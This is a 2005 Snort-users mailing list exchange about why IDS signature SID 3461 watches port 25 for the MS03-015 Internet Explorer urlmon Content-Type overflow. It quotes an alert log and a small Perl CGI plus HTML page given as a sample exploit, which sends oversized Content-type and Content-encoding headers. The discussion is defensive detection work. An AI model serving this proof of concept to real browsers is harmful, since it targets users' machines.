[Snort-users] SMTP Content-Type overflow attempt SID 3461

Alex Kirk alex.kirk at ...1935...
Mon Sep 26 09:39:12 EDT 2005


The rule looks for traffic on port 25 because it's possible to exploit 
this vulnerability via an HTML e-mail message (since Outlook uses IE to 
do HTML rendering). Rules for web-based attacks exist in the Community 
rules as SIDs 100000118 and 100000119.

Alex Kirk
Research Analyst
Sourcefire, Inc.

> I've seen the following alert triggered
>
> [**] [1:3461:2] SMTP Content-Type overflow attempt [**]
> [Classification: Attempted Administrator Privilege Gain] [Priority: 1] 
> 09/25-11:11:06.816693 x.y.z.1:35499 -> 192.168.1.10:25
> TCP TTL:240 TOS:0x10 ID:0 IpLen:20 DgmLen:2776
> ***AP*** Seq: 0xCE9CF6A4  Ack: 0xDEEA2DBD  Win: 0x40B0  TcpLen: 20
> [Xref => 
> http://www.microsoft.com/technet/security/bulletin/MS03-015.mspx][Xref 
> => http://cve.mitre.org/cgi-bin/cvename.cgi?name=2003-0113][Xref => 
> http://www.securityfocus.com/bid/7419]
>
> Yet the Microsoft fix is for Internet Explorer, yet the signature 
> looks for traffic on port TCP / 25. I think the signature should look 
> for this exploit on TCP port 80
>
> Attached is the sample exploit, which would also only effect port 80..
> !/usr/bin/perl
> #
> # Name this file as "urlmon-bo.cgi"
> #
> $LONG="A"x300;
> print "Content-type: $LONG\r\n";
> print "Content-encoding: $LONG\r\n";
> print "\r\n";
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - >8- -
> <html>
> <body>
> <img src="urlmon-bo.cgi">
> </body>
> </html>
>
>





More information about the Snort-users mailing list